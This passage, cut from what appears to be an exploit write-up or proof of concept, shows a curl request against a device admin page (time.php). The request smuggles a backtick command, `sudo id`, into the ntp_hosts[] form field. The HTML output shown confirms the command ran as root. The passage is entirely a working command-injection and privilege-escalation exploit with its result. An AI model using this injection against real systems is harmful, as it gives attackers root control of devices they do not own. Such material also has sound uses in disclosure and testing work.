value="groups=33(www-data),6(disk),25(floppy)"/><br /><br /><br />---<br /><br /><br />$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root<br /> <td>uid=0(root)</td><br /> <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/><br /> <td>gid=0(root)</td><br /> <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/><br /> <td>groups=0(root)</td><br /> <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/><br /></code></pre>